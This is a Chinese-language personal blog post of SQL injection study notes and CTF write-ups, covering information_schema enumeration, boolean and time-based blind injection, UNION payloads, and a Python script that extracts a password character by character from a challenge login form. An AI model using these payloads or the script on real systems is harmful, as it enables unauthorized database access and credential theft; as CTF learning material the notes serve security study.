<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>Zbaoabo</title>

  <!-- keywords -->
  

  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="SQL[TOC] SQL注入产生原理详细分析​          可控变量，带入数据库查询，变量未存在过滤或者过滤不严谨  基本查询语句 123456&gt;select *from users where id&#x3D;1; #select+列名（*代表所有）from+表名 where+条件语句&gt;select * from users where id in (1);#从users表格，查询所有包">
<meta property="og:type" content="article">
<meta property="og:title" content="Zbaoabo">
<meta property="og:url" content="http://example.com/2025/04/19/SQL/index.html">
<meta property="og:site_name" content="Zbaoabo">
<meta property="og:description" content="SQL[TOC] SQL注入产生原理详细分析​          可控变量，带入数据库查询，变量未存在过滤或者过滤不严谨  基本查询语句 123456&gt;select *from users where id&#x3D;1; #select+列名（*代表所有）from+表名 where+条件语句&gt;select * from users where id in (1);#从users表格，查询所有包">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2025/04/19/SQL/image-20250419155825900.png">
<meta property="article:published_time" content="2025-04-19T07:16:43.980Z">
<meta property="article:modified_time" content="2025-09-12T13:16:53.695Z">
<meta property="article:author" content="zhangsuhong">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2025/04/19/SQL/image-20250419155825900.png">
  
    <link rel="alternative" href="/atom.xml" title="Zbaoabo" type="application/atom+xml">
  
  
    <link rel="icon" href="/img/favicon.ico">
  
  
<link rel="stylesheet" href="/css/style.css">

  
  

  
<script src="//cdn.bootcss.com/require.js/2.3.2/require.min.js"></script>

  
<script src="//cdn.bootcss.com/jquery/3.1.1/jquery.min.js"></script>


  
<meta name="generator" content="Hexo 7.3.0"></head>
<body>
  <div id="container">
    <div id="particles-js"></div>
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
	<header id="header" class="inner">
		<a href="/" class="profilepic">
			
				<img lazy-src="" class="js-avatar">
			
		</a>

		<hgroup>
			<h1 class="header-author"><a href="/">zhangsuhong</a></h1>
		</hgroup>

		
			<p class="header-subtitle"></p>
		

		<div class="switch-area">
			<div class="switch-wrap">
				<section class="switch-part switch-part1">
					<nav class="header-menu">
						<ul>
						
							<li><a href="/">Home</a></li>
				        
							<li><a href="/archives">Archives</a></li>
				        
						</ul>
					</nav>
					<nav class="half-header-menu">
						<a class="hide">Home</a>
						<a>Tags</a>
						<a>Links</a>
						<a>About</a>
					</nav>
					<nav class="header-nav">
						<div class="social">
							
						</div>
						<!-- music -->
						
					</nav>
				</section>
				
				
				<section class="switch-part switch-part2">
					<div class="widget tagcloud" id="js-tagcloud">
						
					</div>
				</section>
				
				
				
				<section class="switch-part switch-part3">
					<div id="js-friends">
					
			          <a target="_blank" class="main-nav-link switch-friends-link" href="https://github.com/">github</a>
			        
			        </div>
				</section>
				

				
				
				<section class="switch-part switch-part4">
				
					<div id="js-aboutme">I&#39;m a developer.</div>
				</section>
				
			</div>
		</div>
	</header>				
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
  	<div class="overlay">
  		<div class="slider-trigger"></div>
  		<h1 class="header-author js-mobile-header hide"></h1>
  	</div>
	<div class="intrude-less">
		<header id="header" class="inner">
			<div class="profilepic">
				<img lazy-src="" class="js-avatar">
			</div>
			<hgroup>
			  <h1 class="header-author"></h1>
			</hgroup>
			
			<nav class="header-menu">
				<ul>
				
					<li><a href="/">Home</a></li>
		        
					<li><a href="/archives">Archives</a></li>
		        
		        <div class="clearfix"></div>
				</ul>
			</nav>
			<nav class="header-nav">
				<div class="social">
					
				</div>
			</nav>
		</header>				
	</div>
</nav>
      <div class="body-wrap"><article id="post-SQL" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2025/04/19/SQL/" class="article-date">
  	<time datetime="2025-04-19T07:16:43.980Z" itemprop="datePublished">2025-04-19</time>
</a>
    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="SQL"><a href="#SQL" class="headerlink" title="SQL"></a>SQL</h1><p>[TOC]</p>
<h3 id="SQL注入产生原理详细分析"><a href="#SQL注入产生原理详细分析" class="headerlink" title="SQL注入产生原理详细分析"></a>SQL注入产生原理详细分析</h3><p>​          <strong>可控变量，带入数据库查询，变量未存在过滤或者过滤不严谨</strong> </p>
<p><strong>基本查询语句</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&gt;select *from users where id=1;</span><br><span class="line"> #select+列名（*代表所有）from+表名 where+条件语句</span><br><span class="line">&gt;select * from users where id in (1);</span><br><span class="line">#从users表格，查询所有包含id=3</span><br><span class="line">&gt;select * from users where id=(select id from users where username=&#x27;admin&#x27;);</span><br><span class="line">#子查询 优先执行（）内查询语句</span><br></pre></td></tr></table></figure>

<p><strong>查询参数语句</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&gt;select id from users union select email_id from emails;</span><br><span class="line">#查询并合并数据显示</span><br><span class="line">&gt;select * from users where id=6 union select * from emails where id=6;</span><br><span class="line">ERROR:have a different number of columns 联合注入前后表格列数必须相等</span><br><span class="line">&gt;select * from users where id=6 select *,3 from emails where id=6;</span><br><span class="line">#3为填充列</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><strong>group by(分组)</strong></p>
<h3 id="SQL注入的核心语句"><a href="#SQL注入的核心语句" class="headerlink" title="SQL注入的核心语句"></a>SQL注入的核心语句</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">information_schema</span><br><span class="line"></span><br><span class="line">schemata(schema_name)</span><br><span class="line"></span><br><span class="line">tables(table_schema,table_name)</span><br><span class="line"></span><br><span class="line">columns(table_schema,table_name,column_name)</span><br><span class="line"></span><br><span class="line">select schema_name from information_schema.schemata;</span><br><span class="line"></span><br><span class="line">select table_name from information_schema.tables where table_schema=&#x27;dvwa&#x27;;</span><br><span class="line"></span><br><span class="line">select column_name from information_schema.columns where table_name=&#x27;users&#x27; and table_schema=&#x27;dvwa&#x27;;</span><br><span class="line"></span><br><span class="line">select concat(username,password) from dvwa.users;</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h3 id="布尔盲注"><a href="#布尔盲注" class="headerlink" title="布尔盲注"></a>布尔盲注</h3><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/Xxy605/article/details/109750292">CTFHub_技能树_Web之SQL注入——布尔盲注详细原理讲解_保姆级手把手讲解自动化布尔盲注脚本编写_ctfhub布尔盲注-CSDN博客</a></p>
<pre><code>当存在SQL注入时，攻击者无法通过页面或请求的返回信息，回显或获取到SQL注入语句的执行结果，这种情况就叫盲注。
布尔型盲注就是利用返回的True或False来判断注入语句是否执行成功。它只会根据你的注入信息返回Ture跟Fales，也就没有了之前的报错信息。
</code></pre>
<p><strong>什么情况下考虑使用布尔盲注？</strong></p>
<ol>
<li><p>该输入框存在注入点。</p>
</li>
<li><p>该页面或请求不会回显注入语句执行结果，故无法使用UNION注入。</p>
</li>
<li><p>对数据库报错进行了处理，无论用户怎么输入都不会显示报错信息，故无法使用报错注入。</p>
</li>
</ol>
<h4 id="常用函数"><a href="#常用函数" class="headerlink" title="常用函数"></a>常用函数</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">length（str）函数 返回字符串的长度</span><br><span class="line">substr（str,poc,len）截取字符串,poc表示截取字符串的开始位，len表示截取字符串的长度</span><br><span class="line">ascii（）返回字符的ascii码，返回该字符对应的ascii码</span><br><span class="line">count（）：返回当前列的数量</span><br><span class="line">case when (条件) then 代码1 else 代码2 end :条件成立，则执行代码1，否则执行代码2</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h4 id="函数替换"><a href="#函数替换" class="headerlink" title="函数替换"></a>函数替换</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">1、如果程序过滤了substr函数，可以用其他函数代替：效果与substr（）一样</span><br><span class="line">	left（str，index）从左边第index开始截取</span><br><span class="line">	right(str，index)从右边第index开始截取</span><br><span class="line">	substring（str，index）从左边index开始截取</span><br><span class="line">	mid（str，index，len）截取str从index开始，截取len的长度</span><br><span class="line">	lpad（str，len，padstr）</span><br><span class="line">	rpad（str，len，padstr）在str的左（右）两边填充给定的padstr到指定的长度len，返回填充的结果</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">2、如果程序过滤了 = （等于号），可以用in()、like代替，效果一样：</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">3、如果程序过滤了ascii（），可以用hex()、bin（）、ord()代替，效果一样：</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="布尔盲注的一般流程"><a href="#布尔盲注的一般流程" class="headerlink" title="布尔盲注的一般流程"></a>布尔盲注的一般流程</h3><p>因为盲注不能直接用database（）函数得到数据库名，所以步骤如下：<br>①判断数据库名的长度：<strong>and length(database())&gt;11</strong> 回显正常；**and length(database())&gt;12 **回显错误，说明数据库名是等于12个字符。<br>②猜测数据库名（使用ascii码来依次判断）：**and (ascii(substr(database(),1,1)))&gt;100 –+ **通过不断测试，确定ascii值，查看asciii表可以得出该字符，通过改变database（）后面第一个数字，可以往后继续猜测第二个、第三个字母…<br>③猜测表名：**and (ascii(substr((select table_name from information_schema.tables where table.schema&#x3D;database() limit 1,1)1,1)&gt;144 –+ **往后继续猜测第二个、第三个字母…<br>④猜测字段名（列名）：**and (ascii(substr((select column_name from information_schema.columns where table.schema&#x3D;database() and table_name&#x3D;’数据库表名’ limit 0,1)1,1)&gt;105 –+ **经过猜测 ascii为 105 为i 也就是表的第一个列名 id的第一个字母;同样,通过修改 limit 0,1 获取第二个列名 修改后面1,1的获取当前列的其他字段.<br>⑤猜测字段内容：因为知道了列名，所以直接 select password from users 就可以获取password里面的内容，username也一样 <strong>and (ascii(substr(( select password from users limit 0,1),1,1)))&#x3D;68–+</strong></p>
<h4 id="eg"><a href="#eg" class="headerlink" title="eg"></a>eg</h4><p><strong>遇见这样的界面 可以先扫目录</strong> </p>
<p><img src="/2025/04/19/SQL/image-20250419155825900.png" alt="image-20250419155825900"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">url=&quot;http://43.249.195.138:22649/&quot;</span><br><span class="line">result=&quot;&quot;</span><br><span class="line">op = &quot;&quot;</span><br><span class="line">for i in range(1,50000):  </span><br><span class="line">    l=int(0)</span><br><span class="line">    r=int(128)</span><br><span class="line">    while l&lt;r:</span><br><span class="line">        j=(l+r)&gt;&gt;1</span><br><span class="line">        payload0=&#123;</span><br><span class="line">            &quot;username&quot;: f&quot;admin&#x27; and ascii(substr((select password from users),&#123;i&#125;,1))&gt; &#123;j&#125;#&quot;,</span><br><span class="line">            &quot;password&quot;:&quot;1&quot;,</span><br><span class="line">            &quot;submit&quot;:&quot;%E7%99%BB%E5%BD%95&quot;</span><br><span class="line">        &#125;</span><br><span class="line">        result =requests.post(url=url,data=payload0)</span><br><span class="line">        if (&#x27;用户名或密码错误&#x27; in result.text):</span><br><span class="line">            r=j</span><br><span class="line">        else:</span><br><span class="line">            l=j+1</span><br><span class="line">    op+=chr(l)</span><br><span class="line">    print(op)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">admin&#x27; and length(database()) &gt; 1#爆破当前数据库长度</span><br></pre></td></tr></table></figure>

<p>爆到6报错，说明当前数据库长度为6</p>
<p>继续爆库名</p>
<p>从第一位开始，从a字母开始</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">admin&#x27; and substr(database(),1,1) &gt; &#x27;b&#x27; #第一位为b</span><br><span class="line"></span><br><span class="line">admin&#x27; and substr(database(),2,1) &gt; &#x27;t&#x27; #第二位为t</span><br></pre></td></tr></table></figure>

<p>后面爆出当前库名字就是出题人名字：<strong>bthcls</strong></p>
<p>附件拿到两个字典，应该是表和列的，使用bp来爆破</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">admin&#x27; and substr((select §xx§ from bthcls.§xx§ limit 0,1),1,1)&gt;&#x27;a&#x27; #</span><br></pre></td></tr></table></figure>

<p>得到<strong>bthcls.users.password****有值</strong></p>
<p>爆数据，字典为32-127纯数字（可打印字符的ascii十进制值）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">admin&#x27;and ascii(substr((select group_concat(password)from bthcls.users limit 0,1),1,1))&gt;§32§ #</span><br></pre></td></tr></table></figure>

<p>得到第一位的asciii码十进制为119</p>
<p>后续相同操作一直爆，最后爆出完整密码：119 101 49 99 111 109 101 55 111 49 115 99 116 102</p>
<p>对应字符：<strong>we1come7o1sctf</strong></p>
<p>**账号：**admin</p>
<p>**密码：**we1come7o1sctf</p>
<h3 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">界面返回值只有一种,true 无论输入任何值 返回情况都会按正常的来处理。加入特定的时间函数，通过查看web页面返回的时间差来判断注入的语句是否正确。 </span><br><span class="line">时间盲注与布尔盲注类似。时间型盲注就是利用时间函数的延迟特性来判断注入语句是否执行成功。</span><br><span class="line"></span><br><span class="line">**什么情况下考虑使用时间盲注？**</span><br><span class="line">1. 无法确定参数的传入类型。整型，加单引号，加双引号返回结果都一样</span><br><span class="line">2. 不会回显注入语句执行结果，故无法使用UNION注入</span><br><span class="line">3. 不会显示报错信息，故无法使用报错注入</span><br><span class="line">4. 符合盲注的特征，但不属于布尔型盲注</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h4 id="常用函数-1"><a href="#常用函数-1" class="headerlink" title="常用函数"></a>常用函数</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">sleep(n)：将程序挂起一段时间 n为n秒。</span><br><span class="line">if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句。</span><br><span class="line"></span><br><span class="line">使用sleep()函数和if()函数：`and (if(ascii(substr(database(),1,1))&gt;100,sleep(10),null))  --+`   如果返回正确则 页面会停顿10秒，返回错误则会立马返回。只有指定条件的记录存在时才会停止指定的秒数。</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h4 id="时间盲注的一般流程"><a href="#时间盲注的一般流程" class="headerlink" title="时间盲注的一般流程"></a>时间盲注的一般流程</h4><p>①猜测数据库名称长度：<br>输入：<strong>id&#x3D;1’ and If(length(database()) &gt; 1,1,sleep(5))–+</strong><br>用时：&lt;1s，数据库名称长度&gt;1<br>…<br>输入：<strong>id&#x3D;1’ and If(length(database()) &gt;8 ,1,sleep(5))–+</strong><br>用时：5s，数据库名称长度&#x3D;8<br>得出结论：数据库名称长度等于8个字符。<br>②猜测数据库名称的一个字符：<br>输入：<strong>id&#x3D;1’ and If(ascii(substr(database(),1,1))&#x3D;97,sleep(5),1)–+</strong><br>用时：&lt;1s<br>…<br>输入：<strong>id&#x3D;1’ and If(ascii(substr(database(),1,1))&#x3D;115,sleep(5),1)–+</strong><br>用时：5s</p>
<h4 id="eg-NSSCTF"><a href="#eg-NSSCTF" class="headerlink" title="eg NSSCTF"></a>eg NSSCTF</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?wllm=1&#x27;order by 3 --+</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?wllm=-1 &#x27; union select 1, 2, @@version -- &#x27;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?wllm=-1&#x27;union select 1,database(),version()--+</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?wllm=-1 &#x27; union select 1, 2, user() -- &#x27;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/?wllm=-1 &#x27; union select 1, 2, group_concat(table_name) from information_schema.tables where table_schema=&#x27;test_db&#x27;-- &#x27;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/?wllm=-1 &#x27; union select 1, 2, group_concat(column_name) from information_schema.columns where table_name=&#x27;test_tb&#x27; -- &#x27;</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/?wllm=-1 &#x27; union select 1,2, group_concat(flag) from test_tb -- &#x27;</span><br></pre></td></tr></table></figure>

<h4 id="Newstar"><a href="#Newstar" class="headerlink" title="Newstar"></a>Newstar</h4><h5 id="谢谢皮蛋"><a href="#谢谢皮蛋" class="headerlink" title="谢谢皮蛋"></a>谢谢皮蛋</h5><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1 order by 2#</span><br><span class="line">-1 union select 1,2#</span><br><span class="line">-1 union select 1,database()#</span><br><span class="line">-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#</span><br><span class="line">-1 union select 1,group_concat(column_name) from information_schema.columns where table_name=&#x27;Fl4g&#x27; and table_schema=database()#</span><br><span class="line">-1 union select group_concat(des),group_concat(value) from Fl4g#</span><br></pre></td></tr></table></figure>


      
    </div>
    
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2025/04/21/ViteCVE/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">&lt;</strong>
      <div class="article-nav-title">
        
          (no title)
        
      </div>
    </a>
  
  
    <a href="/2025/04/19/%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title"></div>
      <strong class="article-nav-caption">&gt;</strong>
    </a>
  
</nav>

  
</article>






</div>
      <footer id="footer">
  <div class="outer">
    <div id="footer-info">
      <div class="footer-left">
        &copy; 2025 zhangsuhong
      </div>
        <div class="footer-right">
          <a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/preccrep/hexo-theme-jelly" target="_blank">Jelly</a>
        </div>
    </div>
  </div>
</footer>
    </div>
    
  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">



<script>
	var yiliaConfig = {
		fancybox: true,
		mathjax: false,
		animate: true,
		isHome: false,
		isPost: true,
		isArchive: false,
		isTag: false,
		isCategory: false,
		open_in_new: false
	}
</script>

<script src="/js/main.js"></script>




  </div>
</body>
</html>